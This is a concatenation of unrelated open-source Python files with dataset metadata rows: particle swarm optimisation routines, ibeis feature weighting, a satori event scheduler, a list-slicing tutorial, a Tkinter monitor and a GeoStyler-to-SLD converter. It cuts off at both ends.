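    # position is simply the element-wise sum of the current position and velocity.
    return std_position(np.array([0.0, 1.0]), np.array([0.5, -0.5]))  # -> array([0.5, 0.5])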
def std_velocity(particle, social, state):
"""
Standard particle velocity update according to the equation:
    :math:`v_{ij}(t+1) = \\omega v_{ij}(t) + \
c_1 r_{1j}(t)[y_{ij}(t) - x_{ij}(t)]\\:+ \
c_2 r_{2j}(t)[\\hat{y}_{ij}(t) - x_{ij}(t)],\\;\\;\
\\forall\\; j \\in\\; \\{1,...,n\\}`
If a v_max parameter is supplied (state.params['v_max'] is not None) the
returned velocity is clamped to v_max.
Args:
particle (cipy.algorithms.pso.types.Particle): Particle to update the
velocity for.
social (numpy.array): The social best for the
particle.
state (cipy.algorithms.pso.types.State): The PSO algorithm state.
Returns:
numpy.array: The calculated velocity, clamped to state.params['v_max'].
"""
inertia = state.params['inertia']
c_1, c_2 = state.params['c_1'], state.params['c_2']
v_max = state.params['v_max']
size = particle.position.size
c1r1 = __acceleration__(state.rng, c_1, size)
c2r2 = __acceleration__(state.rng, c_2, size)
velocity = __std_velocity_equation__(inertia, c1r1, c2r2, particle, social)
return __clamp__(velocity, v_max)
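# Hypothetical sketch of the inputs std_velocity expects (the concrete values below
# are made up for illustration; the key names follow the lookups above):
#   state.params = {'inertia': 0.72, 'c_1': 1.4, 'c_2': 1.4, 'v_max': 5.0}
#   state.rng    = a numpy.random.RandomState instance
#   social       = the neighbourhood best position (numpy array) for the particle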
def __std_velocity_equation__(inertia, c1r1, c2r2, particle, social):
return (inertia * particle.velocity +
c1r1 * (particle.best_position - particle.position) +
c2r2 * (social - particle.position))
def __acceleration__(rng, coefficient, size):
return rng.uniform(0.0, coefficient, size)
def __clamp__(velocity, v_max):
return velocity if v_max is None else np.clip(velocity, -v_max, v_max)
def gc_velocity_update(particle, social, state):
""" Guaranteed convergence velocity update.
Args:
particle: cipy.algorithms.pso.Particle: Particle to update the velocity
for.
social: cipy.algorithms.pso.Particle: The social best for the particle.
state: cipy.algorithms.pso.State: The state of the PSO algorithm.
Returns:
numpy.ndarray: the calculated velocity.
"""
gbest = state.swarm[gbest_idx(state.swarm)].position
if not np.array_equal(gbest, particle.position):
return std_velocity(particle, social, state)
rho = state.params['rho']
inertia = state.params['inertia']
v_max = state.params['v_max']
size = particle.position.size
r2 = state.rng.uniform(0.0, 1.0, size)
velocity = __gc_velocity_equation__(inertia, rho, r2, particle, gbest)
return __clamp__(velocity, v_max)
def __gc_velocity_equation__(inertia, rho, r2, particle, gbest):
return (-1 * particle.position + gbest + inertia *
particle.velocity + rho * (1 - 2 * r2))
def std_parameter_update(state, objective_function):
return state
def initialize_particle(rng, domain, fitness_function):
""" Initializes a particle within a domain.
Args:
rng: numpy.random.RandomState: The random number generator.
domain: cipy.problems.core.Domain: The domain of the problem.
Returns:
cipy.algorithms.pso.Particle: A new, fully initialized particle.
"""
position = rng.uniform(domain.lower, domain.upper, domain.dimension)
fitness = fitness_function(position)
return Particle(position=position,
velocity=np.zeros(domain.dimension),
fitness=fitness,
best_fitness=fitness,
best_position=position)
def update_fitness(objective_function, particle):
""" Calculates and updates the fitness and best_fitness of a particle.
Fitness is calculated using the 'problem.fitness' function.
Args:
problem: The optimization problem encapsulating the fitness function
and optimization type.
particle: cipy.algorithms.pso.Particle: Particle to update the fitness
for.
Returns:
cipy.algorithms.pso.Particle: A new particle with the updated fitness.
"""
fitness = objective_function(particle.position)
best_fitness = particle.best_fitness
cmp = comparator(fitness)
if best_fitness is None or cmp(fitness, best_fitness):
best_position = particle.position
return particle._replace(fitness=fitness,
best_fitness=fitness,
best_position=best_position)
else:
return particle._replace(fitness=fitness)
def update_particle(position_update, velocity_update, state, nbest_topology,
idx_particle):
""" Update function for a particle.
Calculates and updates the velocity and position of a particle for a
    single iteration of the PSO algorithm. The social best for the particle is
    determined by the given nbest_topology mapping.
Args:
state: cipy.algorithms.pso.State: The state of the PSO algorithm.
nbest_topology: dict: Containing neighbourhood best index for each
particle index.
idx_particle: tuple: Tuple of the index of the particle and the
particle itself.
Returns:
cipy.algorithms.pso.Particle: A new particle with the updated position
and velocity.
"""
(idx, particle) = idx_particle
nbest = state.swarm[nbest_topology[idx]].best_position
velocity = velocity_update(particle, nbest, state)
position = position_update(particle.position, velocity)
return particle._replace(position=position, velocity=velocity)
def gbest_topology(state):
gbest = gbest_idx(state.swarm)
return __topology__(state.swarm, lambda i: gbest)
def gbest_idx(swarm):
""" gbest Neighbourhood topology function.
Args:
swarm: list: The list of particles.
Returns:
int: The index of the gbest particle.
"""
best = 0
cmp = comparator(swarm[best].best_fitness)
for (idx, particle) in enumerate(swarm):
if cmp(particle.best_fitness, swarm[best].best_fitness):
best = idx
return best
def lbest_topology(state):
return __topology__(state.swarm, lambda i: lbest_idx(state, i))
def lbest_idx(state, idx):
""" lbest Neighbourhood topology function.
Neighbourhood size is determined by state.params['n_s'].
Args:
state: cipy.algorithms.pso.State: The state of the PSO algorithm.
idx: int: index of the particle in the swarm.
Returns:
int: The index of the lbest particle.
"""
swarm = state.swarm
n_s = state.params['n_s']
cmp = comparator(swarm[0].best_fitness)
indices = __lbest_indices__(len(swarm), n_s, idx)
best = None
for i in indices:
if best is None or cmp(swarm[i].best_fitness, swarm[best].best_fitness):
best = i
return best
def __lbest_indices__(size, n_s, idx):
start = idx - (n_s // 2)
idxs = []
for k in range(n_s):
idxs.append((start + k) % size)
return idxs
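def _example_lbest_indices():
    # Illustration helper (not in the original module): the ring neighbourhood wraps
    # around the swarm ends, e.g. a neighbourhood of 3 centred on index 0 of a swarm
    # of 10 covers indices 9, 0 and 1.
    assert __lbest_indices__(10, 3, 0) == [9, 0, 1]
    return __lbest_indices__(10, 3, 0)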
def update_rho(state, objective_function):
params = state.params
rho = params['rho']
e_s = params['e_s']
e_f = params['e_f']
successes = params.get('successes', 0)
failures = params.get('failures', 0)
global_best = solution(state.swarm)
fitness = objective_function(global_best.position)
cmp = comparator(global_best.best_fitness)
if cmp(fitness, global_best.best_fitness):
successes += 1
failures = 0
else:
failures += 1
successes = 0
if successes > e_s:
rho *= 2
elif failures > e_f:
rho *= 0.5
else:
rho = rho
params['rho'] = rho
params['successes'] = successes
params['failures'] = failures
return state._replace(params=params)
def solution(swarm):
""" Determines the global best particle in the swarm.
Args:
swarm: iterable: an iterable that yields all particles in the swarm.
Returns:
cipy.algorithms.pso.Particle: The best particle in the swarm when
comparing the best_fitness values of the particles.
"""
best = swarm[0]
cmp = comparator(best.best_fitness)
for particle in swarm:
if cmp(particle.best_fitness, best.best_fitness):
best = particle
return best
def fitness_measurement(state):
swarm = state.swarm
return 'fitness', swarm[gbest_idx(swarm)].best_fitness
def __topology__(swarm, social_best):
return dict([(idx, social_best(idx)) for idx in range(len(swarm))])
| apache-2.0 | 3,489,454,286,974,073,300 | 29.669872 | 80 | 0.64479 | false |
SU-ECE-17-7/ibeis | _broken/preproc_featweight.py | 1 | 13024 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
# Python
from six.moves import zip, range, map # NOQA
# UTool
import utool as ut
import vtool as vt
#import vtool.image as vtimage
import numpy as np
from ibeis.algo.preproc import preproc_probchip
from os.path import exists
# Inject utool functions
(print, rrr, profile) = ut.inject2(__name__, '[preproc_featweight]')
def test_featweight_worker():
"""
test function
python -m ibeis.algo.preproc.preproc_featweight --test-gen_featweight_worker --show --cnn
"""
import ibeis
qreq_ = ibeis.main_helpers.testdata_qreq_(defaultdb='PZ_MTEST', p=['default:fw_detector=cnn'], qaid_override=[1])
ibs = qreq_.ibs
config2_ = qreq_.qparams
lazy = True
aid_list = qreq_.qaids
#aid_list = ibs.get_valid_aids()[0:30]
kpts_list = ibs.get_annot_kpts(aid_list)
chipsize_list = ibs.get_annot_chip_sizes(aid_list, config2_=config2_)
probchip_fpath_list = preproc_probchip.compute_and_write_probchip(ibs,
aid_list,
lazy=lazy,
config2_=config2_)
print('probchip_fpath_list = %r' % (probchip_fpath_list,))
probchip_list = [vt.imread(fpath, grayscale=True) if exists(fpath) else None
for fpath in probchip_fpath_list]
_iter = list(zip(aid_list, kpts_list, probchip_list, chipsize_list))
_iter = ut.InteractiveIter(_iter, enabled=ut.get_argflag('--show'))
for aid, kpts, probchip, chipsize in _iter:
#kpts = kpts_list[0]
#aid = aid_list[0]
#probchip = probchip_list[0]
#chipsize = chipsize_list[0]
tup = (aid, kpts, probchip, chipsize)
(aid, weights) = gen_featweight_worker(tup)
if aid == 3 and ibs.get_dbname() == 'testdb1':
# Run Asserts if not interactive
weights_03_test = weights[0:3]
print('weights[0:3] = %r' % (weights_03_test,))
#weights_03_target = [ 0.098, 0.155, 0.422]
#weights_03_target = [ 0.324, 0.407, 0.688]
#weights_thresh = [ 0.09, 0.09, 0.09]
#ut.assert_almost_eq(weights_03_test, weights_03_target, weights_thresh)
ut.assert_inbounds(weights_03_test, 0, 1)
if not ut.show_was_requested():
break
if ut.show_was_requested():
import plottool as pt
#sfx, sfy = (probchip.shape[1] / chipsize[0], probchip.shape[0] / chipsize[1])
#kpts_ = vt.offset_kpts(kpts, (0, 0), (sfx, sfy))
pnum_ = pt.make_pnum_nextgen(1, 3) # *pt.get_square_row_cols(4))
fnum = 1
pt.figure(fnum=fnum, doclf=True)
###
pt.imshow(ibs.get_annot_chips(aid, config2_=config2_), pnum=pnum_(0), fnum=fnum)
if ut.get_argflag('--numlbl'):
pt.gca().set_xlabel('(1)')
###
pt.imshow(probchip, pnum=pnum_(2), fnum=fnum)
if ut.get_argflag('--numlbl'):
pt.gca().set_xlabel('(2)')
#pt.draw_kpts2(kpts_, ell_alpha=.4, color_list=pt.ORANGE)
###
#pt.imshow(probchip, pnum=pnum_(3), fnum=fnum)
#color_list = pt.draw_kpts2(kpts_, weights=weights, ell_alpha=.7, cmap_='jet')
#cb = pt.colorbar(weights, color_list)
#cb.set_label('featweights')
###
pt.imshow(ibs.get_annot_chips(aid, config2_=qreq_.qparams), pnum=pnum_(1), fnum=fnum)
#color_list = pt.draw_kpts2(kpts, weights=weights, ell_alpha=.3, cmap_='jet')
color_list = pt.draw_kpts2(kpts, weights=weights, ell_alpha=.3)
cb = pt.colorbar(weights, color_list)
cb.set_label('featweights')
if ut.get_argflag('--numlbl'):
pt.gca().set_xlabel('(3)')
#pt.draw_kpts2(kpts, ell_alpha=.4)
pt.draw()
pt.show_if_requested()
def gen_featweight_worker(tup):
"""
Function to be parallelized by multiprocessing / joblib / whatever.
Must take in one argument to be used by multiprocessing.map_async
Args:
        tup (tuple): (aid, kpts, probchip, chipsize) - annotation rowid, keypoints
            (ndarray), probability chip image (or None), and chip size
CommandLine:
python -m ibeis.algo.preproc.preproc_featweight --test-gen_featweight_worker --show
python -m ibeis.algo.preproc.preproc_featweight --test-gen_featweight_worker --show --dpath figures --save ~/latex/crall-candidacy-2015/figures/gen_featweight.jpg
python -m ibeis.algo.preproc.preproc_featweight --test-gen_featweight_worker --show --db PZ_MTEST --qaid_list=1,2,3,4,5,6,7,8,9
Example:
>>> # DISABLE_DOCTEST
>>> from ibeis.algo.preproc.preproc_featweight import * # NOQA
>>> test_featweight_worker()
Ignore::
import plottool as pt
pt.imshow(probchip_list[0])
patch_list = [vt.patch.get_warped_patch(probchip, kp)[0].astype(np.float32) / 255.0 for kp in kpts[0:1]]
patch_ = patch_list[0].copy()
patch = patch_
patch = patch_[-20:, :20, 0]
import vtool as vt
gaussian_patch = vt.gaussian_patch(patch.shape[1], patch.shape[0], shape=patch.shape[0:2], norm_01=False)
import cv2
sigma = 1/10
xkernel = (cv2.getGaussianKernel(patch.shape[1], sigma))
ykernel = (cv2.getGaussianKernel(patch.shape[0], sigma))
#ykernel = ykernel / ykernel.max()
#xkernel = ykernel / xkernel.max()
gaussian_kern2 = ykernel.dot(xkernel.T)
print(gaussian_kern2.sum())
patch2 = patch.copy()
patch2 = np.multiply(patch2, ykernel)
patch2 = np.multiply(patch2.T, xkernel).T
if len(patch3.shape) == 2:
patch3 = patch.copy() * gaussian_patch[:,:]
else:
patch3 = patch.copy() * gaussian_patch[:,:, None]
sum2 = patch2.sum() / (patch2.size)
sum3 = patch3.sum() / (patch3.size)
print(sum2)
print(sum3)
fig = pt.figure(fnum=1, pnum=(1, 3, 1), doclf=True, docla=True)
pt.imshow(patch * 255)
fig = pt.figure(fnum=1, pnum=(1, 3, 2))
pt.imshow(gaussian_kern2 * 255.0)
fig = pt.figure(fnum=1, pnum=(1, 3, 3))
pt.imshow(patch2 * 255.0)
pt.update()
"""
(aid, kpts, probchip, chipsize) = tup
if probchip is None:
# hack for undetected chips. SETS ALL FEATWEIGHTS TO .25 = 1/4
weights = np.full(len(kpts), .25, dtype=np.float32)
else:
sfx, sfy = (probchip.shape[1] / chipsize[0], probchip.shape[0] / chipsize[1])
kpts_ = vt.offset_kpts(kpts, (0, 0), (sfx, sfy))
#vt.patch.get_warped_patches()
patch_list = [vt.patch.get_warped_patch(probchip, kp)[0].astype(np.float32) / 255.0
for kp in kpts_]
weight_list = [vt.patch.gaussian_average_patch(patch) for patch in patch_list]
#weight_list = [patch.sum() / (patch.size) for patch in patch_list]
weights = np.array(weight_list, dtype=np.float32)
return (aid, weights)
def compute_fgweights(ibs, aid_list, config2_=None):
"""
Example:
>>> # SLOW_DOCTEST
>>> from ibeis.algo.preproc.preproc_featweight import * # NOQA
>>> import ibeis
>>> ibs = ibeis.opendb('testdb1')
>>> aid_list = ibs.get_valid_aids()[1:2]
>>> config2_ = None
>>> featweight_list = compute_fgweights(ibs, aid_list)
>>> result = np.array_str(featweight_list[0][0:3], precision=3)
>>> print(result)
[ 0.125 0.061 0.053]
"""
nTasks = len(aid_list)
print('[preproc_featweight.compute_fgweights] Preparing to compute %d fgweights' % (nTasks,))
probchip_fpath_list = preproc_probchip.compute_and_write_probchip(ibs,
aid_list,
config2_=config2_)
chipsize_list = ibs.get_annot_chip_sizes(aid_list, config2_=config2_)
#if ut.DEBUG2:
# from PIL import Image
# probchip_size_list = [Image.open(fpath).size for fpath in probchip_fpath_list] # NOQA
# #with ut.embed_on_exception_context:
# # does not need to happen anymore
# assert chipsize_list == probchip_size_list, 'probably need to clear chip or probchip cache'
kpts_list = ibs.get_annot_kpts(aid_list, config2_=config2_)
# Force grayscale reading of chips
probchip_list = [vt.imread(fpath, grayscale=True) if exists(fpath) else None
for fpath in probchip_fpath_list]
print('[preproc_featweight.compute_fgweights] Computing %d fgweights' % (nTasks,))
arg_iter = zip(aid_list, kpts_list, probchip_list, chipsize_list)
featweight_gen = ut.generate(gen_featweight_worker, arg_iter,
nTasks=nTasks, ordered=True, freq=10)
featweight_param_list = list(featweight_gen)
#arg_iter = zip(aid_list, kpts_list, probchip_list)
#featweight_param_list1 = [gen_featweight_worker((aid, kpts, probchip)) for
#aid, kpts, probchip in arg_iter]
#featweight_aids = ut.get_list_column(featweight_param_list, 0)
featweight_list = ut.get_list_column(featweight_param_list, 1)
print('[preproc_featweight.compute_fgweights] Done computing %d fgweights' % (nTasks,))
return featweight_list
def generate_featweight_properties(ibs, feat_rowid_list, config2_=None):
"""
Args:
ibs (IBEISController):
fid_list (list):
Returns:
featweight_list
CommandLine:
python -m ibeis.algo.preproc.preproc_featweight --test-generate_featweight_properties
Example:
>>> # DISABLE_DOCTEST
>>> from ibeis.algo.preproc.preproc_featweight import * # NOQA
>>> import ibeis
>>> ibs = ibeis.opendb('testdb1')
>>> config2_ = ibs.new_query_params(dict(fg_on=True, fw_detector='rf'))
>>> aid_list = ibs.get_valid_aids()[1:2]
>>> fid_list = ibs.get_annot_feat_rowids(aid_list, ensure=True)
>>> #fid_list = ibs.get_valid_fids()[1:2]
>>> featweighttup_gen = generate_featweight_properties(ibs, fid_list, config2_=config2_)
>>> featweighttup_list = list(featweighttup_gen)
>>> featweight_list = featweighttup_list[0][0]
>>> featweight_test = featweight_list[0:3]
>>> featweight_target = [ 0.349, 0.218, 0.242]
>>> ut.assert_almost_eq(featweight_test, featweight_target, .3)
"""
# HACK: TODO AUTOGENERATE THIS
#cid_list = ibs.get_feat_cids(feat_rowid_list)
#aid_list = ibs.get_chip_aids(cid_list)
chip_rowid_list = ibs.dbcache.get(ibs.const.FEATURE_TABLE, ('chip_rowid',), feat_rowid_list)
aid_list = ibs.dbcache.get(ibs.const.CHIP_TABLE, ('annot_rowid',), chip_rowid_list)
featweight_list = compute_fgweights(ibs, aid_list, config2_=config2_)
return zip(featweight_list)
#def get_annot_probchip_fname_iter(ibs, aid_list):
# """ Returns probability chip path iterator
# Args:
# ibs (IBEISController):
# aid_list (list):
# Returns:
# probchip_fname_iter
# Example:
# >>> from ibeis.algo.preproc.preproc_featweight import * # NOQA
# >>> import ibeis
# >>> ibs = ibeis.opendb('testdb1')
# >>> aid_list = ibs.get_valid_aids()
# >>> probchip_fname_iter = get_annot_probchip_fname_iter(ibs, aid_list)
# >>> probchip_fname_list = list(probchip_fname_iter)
# """
# cfpath_list = ibs.get_annot_chip_fpath(aid_list, config2_=config2_)
# cfname_list = [splitext(basename(cfpath))[0] for cfpath in cfpath_list]
# suffix = ibs.cfg.detect_cfg.get_cfgstr()
# ext = '.png'
# probchip_fname_iter = (''.join([cfname, suffix, ext]) for cfname in cfname_list)
# return probchip_fname_iter
#def get_annot_probchip_fpath_list(ibs, aid_list):
# cachedir = get_probchip_cachedir(ibs)
# probchip_fname_list = get_annot_probchip_fname_iter(ibs, aid_list)
# probchip_fpath_list = [join(cachedir, fname) for fname in probchip_fname_list]
# return probchip_fpath_list
#class FeatWeightConfig(object):
# # TODO: Put this in a config
# def __init__(fw_cfg):
# fw_cfg.sqrt_area = 800
def on_delete(ibs, featweight_rowid_list, config2_=None):
# no external data to remove
return 0
if __name__ == '__main__':
"""
CommandLine:
python -m ibeis.algo.preproc.preproc_featweight
python -m ibeis.algo.preproc.preproc_featweight --allexamples
python -m ibeis.algo.preproc.preproc_featweight --allexamples --noface --nosrc
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
| apache-2.0 | 8,091,099,537,909,222,000 | 40.74359 | 170 | 0.592061 | false |
zielmicha/satori | satori.events/satori/events/master.py | 1 | 7084 | # vim:ts=4:sts=4:sw=4:expandtab
"""Master (central) event coordinator.
"""
import collections
import select
from _multiprocessing import Connection
from multiprocessing.connection import Listener
from satori.objects import Argument
from .api import Manager
from .client import Client, Scheduler
from .mapper import Mapper
from .protocol import Command, KeepAlive, ProtocolError
class PollScheduler(Scheduler):
"""A Scheduler using select.poll on file descriptors.
"""
def __init__(self):
self.waits = select.poll()
self.fdmap = dict()
self.ready = collections.deque()
def next(self):
"""Return the next Client to handle.
A Client is available when its file descriptor is ready to be read from.
        Available Clients are scheduled in a round-robin fashion.
"""
while len(self.ready) == 0:
for fileno, event in self.waits.poll():
client = self.fdmap[fileno]
if event & (select.POLLERR | select.POLLHUP) != 0:
self.remove(client)
self.ready.append(client)
return self.ready.popleft()
def add(self, client):
"""Add a Client to this Scheduler.
"""
fileno = client.fileno
if fileno in self.fdmap:
return
#print 'PollScheduler: registered new client with fd', fileno
self.fdmap[fileno] = client
self.waits.register(fileno, select.POLLIN | select.POLLHUP | select.POLLERR)
def remove(self, client):
"""Remove a Client from this Scheduler.
"""
fileno = client.fileno
if fileno not in self.fdmap:
return
self.waits.unregister(fileno)
del self.fdmap[fileno]
class SelectScheduler(Scheduler):
"""A Scheduler using select.select on file descriptors.
"""
def __init__(self):
self.fdmap = dict()
self.ready = collections.deque()
def next(self):
"""Return the next Client to handle.
A Client is available when its file descriptor is ready to be read from.
        Available Clients are scheduled in a round-robin fashion.
"""
while len(self.ready) == 0:
for fileno in select.select(self.fdmap.keys(), [], [])[0]:
client = self.fdmap[fileno]
self.ready.append(client)
return self.ready.popleft()
def add(self, client):
"""Add a Client to this Scheduler.
"""
fileno = client.fileno
if fileno in self.fdmap:
return
self.fdmap[fileno] = client
def remove(self, client):
"""Remove a Client from this Scheduler.
"""
fileno = client.fileno
if fileno not in self.fdmap:
return
del self.fdmap[fileno]
class ConnectionClient(Client):
"""Out-of-process Client communicating over multiprocessing.Connection.
"""
@Argument('scheduler', type=Scheduler)
@Argument('connection', type=Connection)
def __init__(self, connection):
self.connection = connection
self.scheduler.add(self)
def sendResponse(self, response):
"""Send a response to this Client.
"""
self.connection.send(response)
def recvCommand(self):
"""Receive the next command from this Client.
"""
command = self.connection.recv()
if not isinstance(command, Command):
raise ProtocolError("received object is not a Command")
return command
def disconnect(self):
"""Disconnect this Client.
"""
self.scheduler.remove(self)
self.connection.close()
fileno = property(lambda self: self.connection.fileno())
class ListenerClient(Client):
"""In-process Client wrapping a multiprocessing.connection.Listener.
"""
@Argument('scheduler', type=Scheduler)
@Argument('listener', type=Listener)
def __init__(self, listener):
self.listener = listener
self.scheduler.add(self)
def sendResponse(self, response):
"""Send a response to this Client.
"""
pass
def recvCommand(self):
"""Receive the next command from this Client.
"""
try:
#print 'ListenerClient: waiting for connection'
connection = self.listener.accept()
#print 'ListenerClient: got connection'
except:
raise ProtocolError("Listener.accept() failed")
ConnectionClient(scheduler=self.scheduler, connection=connection)
return KeepAlive()
def disconnect(self):
"""Disconnect this Client.
"""
self.scheduler.remove(self)
self.listener.close()
# pylint: disable-msg=W0212
fileno = property(lambda self: self.listener._listener._socket.fileno())
# pylint: enable-msg=W0212
class Master(Manager):
"""The central Event Manager.
"""
@Argument('mapper', type=Mapper)
def __init__(self, mapper):
self.mapper = mapper
if hasattr(select, 'poll'):
self.scheduler = PollScheduler()
else:
self.scheduler = SelectScheduler()
self.serial = 0
def connectSlave(self, connection):
"""Attach a new Slave over the given connection.
"""
ConnectionClient(scheduler=self.scheduler, connection=connection)
def listen(self, listener):
"""Listen for new Slave connections using the given Listener.
"""
ListenerClient(scheduler=self.scheduler, listener=listener)
def _print(self, command, sender):
pass
#print 'event master: received', command, 'from', sender
def _handleKeepAlive(self, _command, sender):
self._print(_command, sender)
sender.sendResponse(None)
def _handleDisconnect(self, _command, sender):
self._print(_command, sender)
sender.disconnect()
def _handleAttach(self, command, sender):
self._print(command, sender)
self.dispatcher.attach(sender, command.queue_id)
sender.sendResponse(None)
def _handleDetach(self, command, sender):
self._print(command, sender)
self.dispatcher.detach(sender, command.queue_id)
sender.sendResponse(None)
def _handleMap(self, command, sender):
self._print(command, sender)
mapping_id = self.mapper.map(command.criteria, command.queue_id)
sender.sendResponse(mapping_id)
def _handleUnmap(self, command, sender):
self._print(command, sender)
self.mapper.unmap(command.mapping_id)
sender.sendResponse(None)
def _handleSend(self, command, sender):
self._print(command, sender)
event = command.event
event.serial = self.serial
self.serial += 1
sender.sendResponse(event.serial)
for queue_id in self.mapper.resolve(event):
self.dispatcher.enqueue(queue_id, event)
def _handleReceive(self, _command, sender):
self._print(_command, sender)
self.dispatcher.activate(sender)
| mit | -971,804,800,364,368,400 | 29.273504 | 84 | 0.619565 | false |
zhlooking/LearnPython | Advaced_Features/slice.py | 1 | 1281 | L = ['Micheal', 'Hanson', 'William', 'Lucy', 'Frank']
# if you want to get the first three values in a list
# 1> The simplest way
def getFirstThreeValueOfList1(L):
subL1 = [L[0], L[1], L[2]]
return subL1
# 2> Use a loop
def getSubList(L = None, n = 3):
if (not isinstance(L, (list)) and not isinstance(n, (int, float))):
raise TypeError('bad operand type')
subL2 = []
for i in range(n):
        subL2.append(L[i])
return subL2
# 3> Use Slice feature
def getSubListBySlice(L, first = 0, last = -1):
    if not isinstance(L, list) or not all(isinstance(v, (int, float)) for v in (first, last)):
raise TypeError('bad operand type')
if last > 0 and last > first:
return L[first:last]
elif last < 0 and last + len(L) > first:
return L[first:last]
else:
raise TypeError('Argument value error')
#
# Test
print L
print getSubListBySlice(L, 0, 2)
print getSubListBySlice(L, 3)
print getSubListBySlice(L, -3)
print getSubListBySlice(L, 20, 30)
#### If there is a list and you want to take every n-th value from it
def getValuePerXValue(L, n):
return L[::n]
# Test
NumList = range(100)
print getValuePerXValue(NumList, 22)
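# Added illustration (not in the original script): slicing with a step keeps every
# n-th element starting from index 0
print getValuePerXValue(range(10), 3)    # prints [0, 3, 6, 9]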
#### Iterator ####
from collections import Iterable
print isinstance('ABC', Iterable)
print isinstance([], Iterable)
print isinstance(123, Iterable)
| mit | 1,213,449,190,329,562,000 | 24.117647 | 80 | 0.68306 | false |
ryfeus/lambda-packs | Spacy/source2.7/plac_tk.py | 1 | 1888 | from __future__ import print_function
import os
import sys
import Queue
import plac_core
from Tkinter import Tk
from ScrolledText import ScrolledText
from plac_ext import Monitor, TerminatedProcess
class TkMonitor(Monitor):
"""
An interface over a dictionary {taskno: scrolledtext widget}, with
methods add_listener, del_listener, notify_listener and start/stop.
"""
def __init__(self, name, queue=None):
Monitor.__init__(self, name, queue)
self.widgets = {}
@plac_core.annotations(taskno=('task number', 'positional', None, int))
def add_listener(self, taskno):
"There is a ScrolledText for each task"
st = ScrolledText(self.root, height=5)
st.insert('end', 'Output of task %d\n' % taskno)
st.pack()
self.widgets[taskno] = st
@plac_core.annotations(taskno=('task number', 'positional', None, int))
def del_listener(self, taskno):
del self.widgets[taskno]
@plac_core.annotations(taskno=('task number', 'positional', None, int))
def notify_listener(self, taskno, msg):
w = self.widgets[taskno]
w.insert('end', msg + '\n')
w.update()
def start(self):
'Start the mainloop'
self.root = Tk()
self.root.title(self.name)
self.root.wm_protocol("WM_DELETE_WINDOW", self.stop)
self.root.after(0, self.read_queue)
try:
self.root.mainloop()
except KeyboardInterrupt:
print('Process %d killed by CTRL-C' % os.getpid(), file=sys.stderr)
except TerminatedProcess:
pass
def stop(self):
self.root.quit()
def read_queue(self):
try:
cmd_args = self.queue.get_nowait()
except Queue.Empty:
pass
else:
getattr(self, cmd_args[0])(*cmd_args[1:])
self.root.after(100, self.read_queue)
| mit | 2,970,059,258,354,080,000 | 29.95082 | 79 | 0.610169 | false |
tomchadwin/qgis2web | qgis2web/bridgestyle/sld/fromgeostyler.py | 1 | 20761 | import os
from xml.etree.ElementTree import Element, SubElement
from xml.etree import ElementTree
from xml.dom import minidom
from .transformations import processTransformation
import zipfile
_warnings = []
# return a dictionary<int,list of rules>, where int is the Z value
# symbolizers are marked with a Z
#
# a rule (with multiple symbolizers) will have the rule replicated, one for each Z value found in the symbolizer
#
# ie. rule[0]["symbolizers"][0] has Z=0
# rule[0]["symbolizers"][1] has Z=1
#
# this will return
# result[0] => rule with symbolizer 0 (name changed to include Z=0)
# result[1] => rule with symbolizer 1 (name changed to include Z=1)
def processRulesByZ(rules):
result = {}
for rule in rules:
for symbolizer in rule["symbolizers"]:
z = symbolizer.get("Z", 0)
if z not in result:
result[z] = []
r = result[z]
rule_copy = rule.copy()
rule_copy["symbolizers"] = [symbolizer]
rule_copy["name"] += ", Z=" + str(z)
r.append(rule_copy)
return result
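def _example_process_rules_by_z():
    # Illustration helper (not part of the original module; the rule below is made
    # up): a rule whose symbolizers carry different Z values is split into one rule
    # copy per Z level, and ", Z=<value>" is appended to each copy's name.
    rule = {"name": "r",
            "symbolizers": [{"kind": "Line", "Z": 0}, {"kind": "Fill", "Z": 1}]}
    return processRulesByZ([rule])
    # -> {0: [{"name": "r, Z=0", "symbolizers": [{"kind": "Line", "Z": 0}]}],
    #     1: [{"name": "r, Z=1", "symbolizers": [{"kind": "Fill", "Z": 1}]}]}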
def convert(geostyler):
global _warnings
_warnings = []
attribs = {
"version": "1.0.0",
"xsi:schemaLocation": "http://www.opengis.net/sld StyledLayerDescriptor.xsd",
"xmlns": "http://www.opengis.net/sld",
"xmlns:ogc": "http://www.opengis.net/ogc",
"xmlns:xlink": "http://www.w3.org/1999/xlink",
"xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
rulesByZ = processRulesByZ(geostyler["rules"])
root = Element("StyledLayerDescriptor", attrib=attribs)
namedLayer = SubElement(root, "NamedLayer")
layerName = SubElement(namedLayer, "Name")
layerName.text = geostyler["name"]
userStyle = SubElement(namedLayer, "UserStyle")
userStyleTitle = SubElement(userStyle, "Title")
userStyleTitle.text = geostyler["name"]
z_values = list(rulesByZ.keys())
z_values.sort()
for z_value in z_values:
zrules = rulesByZ[z_value]
featureTypeStyle = SubElement(userStyle, "FeatureTypeStyle")
if "transformation" in geostyler:
featureTypeStyle.append(processTransformation(geostyler["transformation"]))
for rule in zrules:
featureTypeStyle.append(processRule(rule))
if "blendMode" in geostyler:
_addVendorOption(featureTypeStyle, "composite", geostyler["blendMode"])
sldstring = ElementTree.tostring(root, encoding="utf8", method="xml").decode()
dom = minidom.parseString(sldstring)
result = dom.toprettyxml(indent=" "), _warnings
return result
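# Hypothetical usage sketch (comment only; the style dict is made up for
# illustration): convert() takes a GeoStyler-like dict and returns a tuple of
# (pretty-printed SLD string, list of warnings), e.g.
#   _style = {"name": "points",
#             "rules": [{"name": "single symbol", "symbolizers": [
#                 {"kind": "Mark", "wellKnownName": "circle",
#                  "color": "#ff0000", "size": 6}]}]}
#   _sld, _warns = convert(_style)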
def processRule(rule):
ruleElement = Element("Rule")
ruleName = SubElement(ruleElement, "Name")
ruleName.text = rule.get("name", "")
ruleFilter = rule.get("filter", None)
if ruleFilter == "ELSE":
filterElement = Element("ElseFilter")
ruleElement.append(filterElement)
else:
filt = convertExpression(ruleFilter)
if filt is not None:
filterElement = Element("ogc:Filter")
filterElement.append(filt)
ruleElement.append(filterElement)
if "scaleDenominator" in rule:
scale = rule["scaleDenominator"]
if "min" in scale:
minScale = SubElement(ruleElement, "MinScaleDenominator")
minScale.text = str(scale["min"])
if "max" in scale:
maxScale = SubElement(ruleElement, "MaxScaleDenominator")
maxScale.text = str(scale["max"])
symbolizers = _createSymbolizers(rule["symbolizers"])
ruleElement.extend(symbolizers)
return ruleElement
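# Hypothetical rule sketch (comment only; the values are made up): processRule()
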